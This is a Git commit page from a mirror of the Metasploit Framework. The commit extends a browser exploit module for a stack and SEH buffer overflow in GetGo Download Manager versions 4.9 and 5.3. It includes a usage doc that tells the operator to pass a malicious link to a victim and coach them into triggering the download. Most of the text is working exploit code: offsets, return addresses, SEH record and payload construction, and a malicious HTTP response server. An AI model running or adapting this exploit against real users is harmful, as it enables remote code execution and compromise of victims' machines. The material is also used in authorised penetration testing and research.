infosecn1nja
/
metasploit-framework
mirror of https://github.com/infosecn1nja/metasploit-framework.git
1
0
Fork 0
Code Issues Packages Projects Releases Wiki Activity

Land #9642, support version 5 for GetGo Download Manager bof exploit

4.x
Wei Chen 2018-10-15 15:47:35 -05:00 committed by Metasploit
parent 52a919c361
commit 7d04ebcf5f
No known key found for this signature in database
GPG Key ID: CDFB5FA52007B954
2 changed files with 87 additions and 101 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

30
documentation/modules/exploit/windows/browser/getgodm_http_response_bof.md Normal file
View File

@ -0,0 +1,30 @@
## Description
This modules adds a buffer overflow exploit for GetGo Download Manager, which supports
4.9.0.1982 and 5.3.0.2712. Versions prior should also be vulnerable.
This exploit has been tested on Windows XP SP3. The vulnerable software can be downloaded
at [GetGo Download Manager 5.3.0.2712](https://www.exploit-db.com/apps/b26d82eadef93531f8beafac6105ef13-GetGoDMSetup.exe)
To use this, first start the module like the following example:
```
msf5 exploit(windows/browser/getgodm_http_response_bof) > run
[*] Exploit running as background job 0.
[*] Exploit completed, but no session was created.
[*] Started reverse TCP handler on 192.168.0.12:4444
msf5 exploit(windows/browser/getgodm_http_response_bof) > [*] Using URL: http://0.0.0.0:8080/shakeitoff.mp3
[*] Local IP: http://192.168.0.12:8080/shakeitoff.mp3
[*] Server started.
```
The exploit should give you a fake link. Pass this link to the Getgo user, and instruct them to
do the following:
1. Start GetGo Download Manager
2. Click on the DOWNLOAD button
3. Click on New (if the link is already copied to the clipboard, clicking on this should trigger
the download, and get exploited).
4. If the link isn't in the clipboard, instruct the user to enter the URL in the URL field, and
click OK. The user should also get exploited this way.

158
modules/exploits/windows/browser/getgodm_http_response_bof.rb
View File

@ -14,7 +14,7 @@ class MetasploitModule < Msf::Exploit::Remote
'Name' => 'GetGo Download Manager HTTP Response Buffer Overflow', 'Name' => 'GetGo Download Manager HTTP Response Buffer Overflow',
'Description' => %q{ 'Description' => %q{
This module exploits a stack-based buffer overflow vulnerability in This module exploits a stack-based buffer overflow vulnerability in
GetGo Download Manager version 4.9.0.1982 and earlier, caused by an GetGo Download Manager version 5.3.0.2712 earlier, caused by an
overly long HTTP response header. overly long HTTP response header.
By persuading the victim to download a file from a malicious server, a By persuading the victim to download a file from a malicious server, a
@ -26,7 +26,9 @@ class MetasploitModule < Msf::Exploit::Remote
'Author' => 'Author' =>
[ [
'Julien Ahrens', # Vulnerability discovery 'Julien Ahrens', # Vulnerability discovery
'Gabor Seljan' # Metasploit module 'Gabor Seljan', # Metasploit module for v4
'bzyo', # Metasploit module for v5
'sinn3r' # Helping Gabor and bzyo (see #4588 & #9642)
], ],
'References' => 'References' =>
[ [
@ -42,16 +44,33 @@ class MetasploitModule < Msf::Exploit::Remote
'Platform' => 'win', 'Platform' => 'win',
'Payload' => 'Payload' =>
{ {
'BadChars' => "\x00\x0a\x0d", # v5 has no bad chars
'Space' => 2000 'BadChars' => "\x00\x0a\x0d"
}, },
'Targets' => 'Targets' =>
[ [
[ 'Windows XP SP3', [
'Automatic', {}
],
[ '4.9.0.1982 on Windows XP SP3',
{ {
'Offset' => 4107, 'Offset' => 4107,
'Ret' => 0x00280b0b # CALL DWORD PTR SS:[EBP+30] 'Ret' => 0x00280b0b # CALL DWORD PTR SS:[EBP+30]
} }
],
[
'5.3.0.2712 on Windows XP SP3',
{
'Offset' => 4095,
# 0:016> u 0x72d11f39
# msacm32!wodMessage+0xd0f:
# 72d11f39 5f pop edi
# 72d11f3a 5e pop esi
# 72d11f3b c20400 ret 4
'Ret' => 0x72d11f39,
# 12253 is the same size the python PoC used
'MaxSize' => 12253
}
] ]
], ],
'Privileged' => false, 'Privileged' => false,
@ -59,102 +78,11 @@ class MetasploitModule < Msf::Exploit::Remote
'DefaultTarget' => 0)) 'DefaultTarget' => 0))
end end
# # This part is from Gabor Seljan
# Handle the HTTP request and return a response. def exploit_v4(cli, current_taget)
# Code borrowed from: msf/core/exploit/http/server.rb sploit = rand_text_alpha(current_taget['Offset'])
#
def start_http(opts={})
# Ensture all dependencies are present before initializing HTTP
use_zlib
comm = datastore['ListenerComm']
if (comm.to_s == "local")
comm = ::Rex::Socket::Comm::Local
else
comm = nil
end
# Default the server host / port
opts = {
'ServerHost' => datastore['SRVHOST'],
'ServerPort' => datastore['HTTPPORT'],
'Comm' => comm
}.update(opts)
# Start a new HTTP server
@http_service = Rex::ServiceManager.start(
Rex::Proto::Http::Server,
opts['ServerPort'].to_i,
opts['ServerHost'],
datastore['SSL'],
{
'Msf' => framework,
'MsfExploit' => self
},
opts['Comm'],
datastore['SSLCert']
)
@http_service.server_name = datastore['HTTP::server_name']
# Default the procedure of the URI to on_request_uri if one isn't
# provided.
uopts = {
'Proc' => Proc.new { |cli, req|
on_request_uri(cli, req)
},
'Path' => resource_uri
}.update(opts['Uri'] || {})
proto = (datastore["SSL"] ? "https" : "http")
print_status("Using URL: #{proto}://#{opts['ServerHost']}:#{opts['ServerPort']}#{uopts['Path']}")
if (opts['ServerHost'] == '0.0.0.0')
print_status(" Local IP: #{proto}://#{Rex::Socket.source_address('1.2.3.4')}:#{opts['ServerPort']}#{uopts['Path']}")
end
# Add path to resource
@service_path = uopts['Path']
@http_service.add_resource(uopts['Path'], uopts)
# As long as we have the http_service object, we will keep the server alive
while @http_service
select(nil, nil, nil, 1)
end
end
#
# Kill HTTP/FTP (shut them down and clear resources)
#
def cleanup
super
stop_service
begin
@http_service.remove_resource(datastore['URIPATH'])
@http_service.deref
@http_service.stop
@http_service.close
@http_service = nil
rescue
end
end
def on_request_uri(cli, request)
print_status("Client connected...")
unless request['User-Agent'] =~ /GetGo Download Manager 4.0/
print_error("Sending 404 for unknown user-agent")
send_not_found(cli)
return
end
sploit = rand_text_alpha(target['Offset'])
sploit << "\x90\x90\xEB\x06" sploit << "\x90\x90\xEB\x06"
sploit << [target.ret].pack('V') sploit << [current_taget.ret].pack('V')
sploit << payload.encoded sploit << payload.encoded
print_status("Sending #{sploit.length} bytes to port #{cli.peerport}...") print_status("Sending #{sploit.length} bytes to port #{cli.peerport}...")
@ -162,8 +90,36 @@ class MetasploitModule < Msf::Exploit::Remote
resp = create_response(200, sploit) resp = create_response(200, sploit)
resp.body = "" resp.body = ""
cli.send_response(resp) cli.send_response(resp)
end
close_client(cli) # This part is from Auxilus with some help from @_sinn3r
def exploit_v5(cli, current_taget)
seh_record = generate_seh_record(current_taget.ret)
# Minus 4 for the SEH record
buffer = Rex::Text.rand_text_alpha(current_taget['Offset'] - 4)
buffer << seh_record
buffer << payload.encoded
buffer << Rex::Text.rand_text_alpha(current_taget['MaxSize'] - buffer.length)
res = create_response(200, buffer)
cli.send_response(res)
end
def on_request_uri(cli, request)
print_status("#{cli.peerhost} connected")
current_target = target
user_agent = request.headers['User-Agent'].to_s
if current_target == targets[1] || user_agent.match(/GetGo Download Manager 4\.0/)
print_status('Attempting to exploit against v4')
current_target = targets[1]
exploit_v4(cli, current_target)
elsif current_target == targets[2] || user_agent.match(/GetGo Download Manager 5\.0/)
print_status('Attempting to exploit against v5')
current_target = targets[2]
exploit_v5(cli, current_target)
else
print_error('Sending 404 for unknown user-agent')
send_not_found(cli)
end
end end
end end